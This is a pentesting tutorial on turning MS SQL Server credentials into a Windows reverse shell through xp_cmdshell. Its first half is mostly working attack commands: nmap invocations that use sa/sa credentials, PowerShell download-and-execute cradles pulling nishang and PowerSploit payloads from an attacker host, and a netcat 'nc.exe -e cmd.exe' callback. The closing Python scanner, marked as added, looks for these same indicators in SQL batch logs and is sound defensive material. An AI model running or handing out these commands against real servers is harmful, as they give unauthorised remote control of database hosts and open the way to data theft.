How to get an xp_cmdshell reverse shell on a Windows Server
In a pentesting engagement, if you have obtained credentials for the MS SQL Server, you can execute commands on the database server with the nmap NSE script ms-sql-xp-cmdshell.
In the following example we execute the whoami command on the MS SQL Windows server:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP
You have to substitute the following parameters in the above command:
mssql.username: Database username (sa in the example)
mssql.password: Database password (sa in the example)
ms-sql-xp-cmdshell.cmd: Command to execute (whoami in the example)
If you want to execute a reverse shell that connects back to your machine, you can use any of the Windows PowerShell post-exploitation frameworks shown below.
xp_cmdshell with nishang
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"
xp_cmdshell with PowerSploit
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
xp_cmdshell with nc
First we need to download nc.exe to the target machine (192.168.1.10) from our machine (192.168.1.3):
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget http://192.168.1.3/nc.exe -OutFile c:\\Users\Public\\nc.exe" 192.168.1.10
Now we can execute the reverse shell:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.3 4444" 192.168.1.10
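For the blue-team side of the same activity, here is an added example (not from the original post) that scans SQL Server batch records for the steps shown above: xp_cmdshell being switched on through sp_configure, and xp_cmdshell calls whose operating-system command carries a PowerShell download cradle, an in-memory IEX, an execution-policy bypass or a netcat `-e` shell. The record layout and the sample batches are constructed, loosely modelled on the batch_text field of an Extended Events sql_batch_completed capture.

```python
import re

# Constructed sample batches, modelled on the batch_text field of a SQL Server
# Extended Events sql_batch_completed capture (the field layout is an assumption).
SAMPLE_EVENTS = [
    {"login": "sa", "client": "192.168.1.3", "batch_text": "SELECT name FROM sys.databases"},
    {"login": "sa", "client": "192.168.1.3",
     "batch_text": "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
                   "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"},
    {"login": "sa", "client": "192.168.1.3", "batch_text": "EXEC master..xp_cmdshell 'whoami'"},
    {"login": "sa", "client": "192.168.1.3",
     "batch_text": "EXEC master..xp_cmdshell 'powershell.exe wget http://192.168.1.3/nc.exe "
                   "-OutFile c:\\Users\\Public\\nc.exe'"},
    {"login": "sa", "client": "192.168.1.3",
     "batch_text": "EXEC master..xp_cmdshell 'c:\\Users\\Public\\nc.exe -e cmd.exe 192.168.1.3 4444'"},
    {"login": "app_user", "client": "10.0.0.5", "batch_text": "EXEC master..xp_cmdshell 'dir c:\\backups'"},
]

ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
# Captures the OS command passed to xp_cmdshell; doubled quotes are T-SQL escapes.
CMDSHELL_RE = re.compile(r"xp_cmdshell\s+N?'((?:[^']|'')*)'", re.I)

# Indicators inside the OS command that match the tradecraft shown on this page.
HIGH_RISK = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|\bwget\b|invoke-webrequest|\biwr\b|-outfile", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("policy bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)),
    ("netcat shell", re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s", re.I)),
]

def classify(event):
    """Return a finding dict for one batch record, or None if it is benign."""
    text = event["batch_text"]
    if ENABLE_RE.search(text):
        return {"severity": "high", "reason": "xp_cmdshell enabled via sp_configure", "command": None}
    m = CMDSHELL_RE.search(text)
    if not m:
        return None
    cmd = m.group(1).replace("''", "'")
    tags = [name for name, rx in HIGH_RISK if rx.search(cmd)]
    # Any xp_cmdshell use is worth a look; known shell tradecraft escalates it.
    return {"severity": "critical" if tags else "medium",
            "reason": ", ".join(tags) or "xp_cmdshell execution", "command": cmd}

def scan(events):
    """Classify every record and attach the login and client address to each finding."""
    return [{**f, "login": ev["login"], "client": ev["client"]}
            for ev in events if (f := classify(ev)) is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['login']}@{f['client']}: {f['reason']} -> {f['command']}")
```

The sp_configure hit is the earliest signal: xp_cmdshell is off by default, so an enable followed by execution from the same login and client in a short window is the pattern to alert on.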